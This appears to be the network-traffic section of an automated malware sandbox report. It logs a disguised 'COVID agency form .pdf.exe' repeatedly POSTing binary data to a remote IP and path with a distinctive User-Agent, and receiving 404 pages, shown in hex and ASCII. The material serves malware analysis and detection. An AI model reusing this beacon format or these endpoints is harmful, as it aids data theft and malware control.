                                        Jul 1, 2021 14:36:33.568566084 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568645954 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568691969 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568737030 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568780899 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568964005 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.568994045 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.568996906 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.568999052 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.569153070 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.577445984 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.577622890 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.787909031 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.948501110 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.950041056 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.952661037 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:34.112454891 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.113523006 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:34.275362968 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788209915 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788239002 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788250923 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788266897 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788281918 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788295984 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788311005 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788325071 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788336039 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:34.788417101 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:34.788491011 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:34.796504021 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.796613932 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:35.105285883 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:35.263746023 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:35.263948917 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:35.267014027 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:35.425731897 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:35.425919056 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:35.587373972 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.150140047 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151612997 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151654005 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151689053 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151710987 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151729107 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151747942 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151770115 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.151772022 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151823044 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.152213097 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.152244091 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.158884048 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.159008026 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.326832056 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.483360052 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.483510017 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.486135960 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.641176939 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.641344070 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.798700094 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338311911 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338437080 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338485956 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338534117 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338567972 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:37.338577032 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338610888 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:37.338614941 CEST804972163.141.228.141192.168.2.3

                                        HTTP Request Dependency Graph

                                        • 63.141.228.141

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.34971563.141.228.14180C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 1, 2021 14:36:31.408982038 CEST1340OUTPOST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 190
                                        Connection: close
                                        Jul 1, 2021 14:36:32.256418943 CEST1344INHTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:31 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.34971763.141.228.14180C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 1, 2021 14:36:32.663220882 CEST1365OUTPOST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 190
                                        Connection: close
                                        Jul 1, 2021 14:36:33.568382978 CEST1368INHTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:32 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.34971963.141.228.14180C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 1, 2021 14:36:33.952661037 CEST1383OUTPOST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 163
                                        Connection: close
                                        Jul 1, 2021 14:36:34.788209915 CEST1393INHTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:34 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.34972063.141.228.14180C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 1, 2021 14:36:35.267014027 CEST1403OUTPOST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 163
                                        Connection: close
                                        Jul 1, 2021 14:36:36.150140047 CEST1404INHTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:35 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 